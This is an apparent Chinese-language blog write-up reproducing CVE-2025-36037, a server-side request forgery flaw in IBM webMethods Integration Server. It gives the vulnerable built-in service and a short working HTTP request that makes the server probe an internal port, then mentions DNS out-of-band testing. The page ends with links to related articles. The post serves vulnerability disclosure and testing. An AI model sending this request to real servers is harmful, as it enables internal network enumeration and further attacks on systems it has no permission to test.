CVE-2025-36037-IBM webMethods 集成服务器请求伪造-漏洞复现

墨言ink2026-01-13 8:33

工作的时候渗透测试了这个系统,找到了N-day但是没有公开的漏洞复现细节,在此分享一下。

IBM webMethods 集成服务器请求伪造漏洞

漏洞概述

IBM webMethods Integration 服务器受到服务器端请求伪造 (SSRF) 的影响。这可能允许经过身份验证的攻击者从系统发送未经授权的请求,潜在地导致网络枚举或促进其他攻击

漏洞地址

https://nvd.nist.gov/vuln/detail/CVE-2025-36037

影响版本

IBM webMethods Integration 10.15

IBM webMethods Integration 11.1

漏洞复现

需要先登入,进入webMethods系统

Packages-Management-WmPublic-Browse services in WmPublic

可以找到很多打包好的服务

测试发现pub.client:http包可以进行SSRF漏洞的利用。

漏洞POC

复制代码 
POST /invoke/pub.client:http HTTP/1.1
HOST:
Cookie:
Content-Type: application/x-www-form-urlencode

url=http://127.0.0.1:22&method=get

利用SSRF探测发现22端口开放。也可以进行DNS外带测试。

相关推荐
网安老伯9 小时前
护网行动防守实战:Web应用XSS漏洞应急处置与防护体系搭建_护网行动web应用
linux·运维·服务器·前端·web安全·网络安全·xss
网络安全许木1 天前
自学渗透测试第12天(渗透测试流程与DVWA部署)
web安全·网络安全·渗透测试
买大橘子也用券2 天前
2026红明谷
python·web安全
航Hang*2 天前
网络安全技术基础——第3章:网络攻击技术
运维·网络·笔记·安全·web安全·php
一名优秀的码农2 天前
vulhub系列-64-Cereal: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
一名优秀的码农2 天前
vulhub系列-66-Hms?: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
OPHKVPS2 天前
React2Shell漏洞攻击中的新型恶意软件EtherRAT详解
网络·安全·web安全
CHICX12292 天前
5.SQL 注入之高权限注入(下):文件读写 + 写 Shell,从数据库权限到服务器控制权
web安全·网络安全
Sombra_Olivia2 天前
Vulhub 中的 bash CVE-2014-6271
安全·web安全·网络安全·渗透测试·vulhub
zjeweler2 天前
web安全-waf+免杀
安全·web安全
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南05MySQL表约束详解:8大核心约束实战指南06Oh My Codex 快速使用指南07CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南08实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了09VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)10UV安装并设置国内源